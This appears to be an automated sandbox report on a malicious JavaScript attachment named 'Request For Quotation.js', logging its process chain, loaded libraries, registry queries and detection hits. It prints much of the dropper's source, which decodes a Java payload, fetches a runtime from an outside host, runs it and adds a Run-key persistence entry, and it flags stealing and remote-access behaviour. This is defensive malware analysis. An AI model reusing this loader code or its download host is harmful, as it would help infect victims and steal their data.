Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6848:120:WilError_03
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe File created: C:\Users\user\AppData\Local\Temp\hsperfdata_user
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Request For Quotation.js Virustotal: Detection: 35%
Source: Request For Quotation.js ReversingLabs: Detection: 26%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Request For Quotation.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\otyhtiklwj.txt"
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\SysWOW64\icacls.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msdart.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: wsock32.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: winmm.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: userenv.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dpapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: ncrypt.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.CreateObject("WScript.Shell");var tempdir = wshShell.ExpandEnvironmentStrings("%temp%");var appdatadir = wshShell.ExpandEnvironmentStrings("%appdata%");var r = Math.random().toString(36).replace(/[^a-z]+/g, '').substr(0, 10);var stubpath = appdatadir + "\\" + r + ".txt"var decoded = decodeBase64(longText);writeBytes(stubpath, decoded);var fso = WScript.CreateObject("Scripting.FileSystemObject");var text = "";try{text = wshShell.RegRead("HKLM\\SOFTWARE\\Wow6432Node\\JavaSoft\\Java Runtime Environment\\CurrentVersion");text = wshShell.RegRead("HKLM\\SOFTWARE\\Wow6432Node\\JavaSoft\\Java Runtime Environment\\" + text + "\\JavaHome");}catch(err){}try{if(text == ""){text = wshShell.RegRead("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\CurrentVersion");text = wshShell.RegRead("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\" + text + "\\JavaHome");if(text != ""){text = text + "\\bin\\javaw.exe";}}else{text = text + "\\bin\\javaw.exe";}}catch(err){}try{if(text != ""){//wshShell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntfsmgr", "\"" + text + "\" -jar \"" + stubpath + "\"", "REG_SZ");wshShell.run("\"" + text + "\" -jar \"" + stubpath + "\"");} else{GrabJreFromNet();}} catch(err){}function GrabJreFromNet(){do{try{var xHttp = WScript.CreateObject("msxml2.serverxmlhttp.6.0");var bStrm = WScript.CreateObject("Adodb.Stream");xHttp.open("GET", "http://wshsoft.company/jv/jrex.zip", false);xHttp.setOption(2, 13056);xHttp.send();bStrm.Type = 1;bStrm.open();bStrm.write(xHttp.responseBody);bStrm.savetofile(appdatadir + "\\jre.zip", 2);break;}catch(err){WScript.Sleep(5000);}}while(true);UnZip(appdatadir + "\\jre.zip", appdatadir + "\\jre7");//wshShell.RegWrite("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\CurrentVersion", "1.8", "REG_SZ");//wshShell.RegWrite("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\1.8\\JavaHome", appdatadir + "\\jre7", 
"REG_SZ");wshShell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntfsmgr", "\"" + appdatadir + "\\jre7\\bin\\javaw.exe\" -jar " + "\"" + stubpath + "\"", "REG_SZ");wshShell.run("\"" + appdatadir + "\\jre7\\bin\\javaw.exe\" -jar " + "\"" + stubpath + "\"");}function decodeBase64(base64){var DM = WScript.CreateObject("Microsoft.XMLDOM");var EL = DM.createElement("tmp");EL.dataType = "bin.base64";EL.text = base64;return EL.nodeTypedValue;}function writeBytes(file, bytes){var binaryStream = WScript.CreateObject("ADODB.Stream");binaryStream.Type = 1;binaryStream.Open();binaryStream.Write(bytes);binaryStream.SaveToFile(file, 2);}function UnZip(zipfile, ExtractTo){if(fso.GetExtensionName(zipfile) == "zip"){if(!fso.FolderExists(ExtractTo)){fso.CreateFolder(ExtractTo);}var objShell = WScript.CreateObject("Shell.Application");var destination = objShell.NameSpace(ExtractTo);var zip_content = objShell.NameSpace(zipfile).Items(); for(i = 0; i < zip_content.Count; i++){if(fso.FileExists(fso.Buildpath(ExtractTo,zip_content.item(i).name)+"."+fso.getExtensionName
Source: Yara match File source: 00000002.00000002.3326043474.0000000009B95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.3326043474.0000000009B63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: javaw.exe PID: 7100, type: MEMORYSTR
Source: Request For Quotation.js String : entropy: 5.53, length: 213714, content: 'dmFyIG5lbTQ0Ow0{1}dmFyIGxvbmd{0}ZXh0I{2}0gIlVFc0RCQlE8JTx{2}PC{0}8Z0k8JTx{2}cTh0MWc8JTw8JTw8JTw8JTw
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_14D09CCA push es; retf 0034h 2_3_14D09CD3
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_14D0A080 push es; retn 0045h 2_3_14D0A10B
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_14D0A05D push es; retn 0045h 2_3_14D0A10B
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_14D09647 push edx; iretd 2_3_14D096AB
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_14D033E5 push cs; ret 2_3_14D033E6
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_14D0A54B push es; retn 0059h 2_3_14D0A60B
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_14D0CF37 push eax; iretd 2_3_14D0CF49
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_0247D8F7 push 00000000h; mov dword ptr [esp], esp 2_2_0247D921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_0247A20A push ecx; ret 2_2_0247A21A
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_0247A21B push ecx; ret 2_2_0247A225
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_0247BB67 push 00000000h; mov dword ptr [esp], esp 2_2_0247BB8D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_0247B3B7 push 00000000h; mov dword ptr [esp], esp 2_2_0247B3DD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: javaw.exe, 00000002.00000003.2063090050.0000000014A6C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: javaw.exe, 00000002.00000003.2063090050.0000000014A6C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: javaw.exe, 00000002.00000002.3323308620.00000000009F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [Ljava/lang/VirtualMachineError;
Source: javaw.exe, 00000002.00000003.2063090050.0000000014A6C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: org/omg/CORBA/OMGVMCID.classPK
Source: javaw.exe, 00000002.00000002.3323308620.00000000009F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cjava/lang/VirtualMachineError
Source: javaw.exe, 00000002.00000003.2063090050.0000000014A6C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: java/lang/VirtualMachineError.classPK
Source: javaw.exe, 00000002.00000002.3323308620.00000000009F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Memory protected: page read and write | page guard
Source: C:\Windows\System32\wscript.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\otyhtiklwj.txt"
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_024703C0 cpuid 2_2_024703C0
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersion
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\7100 VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\rt.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jce.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\charsets.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Users\user\3608lock.file VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

barindex
Source: Yara match File source: 00000002.00000002.3326043474.0000000009B69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: javaw.exe PID: 7100, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: 00000002.00000002.3326043474.0000000009B69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: javaw.exe PID: 7100, type: MEMORYSTR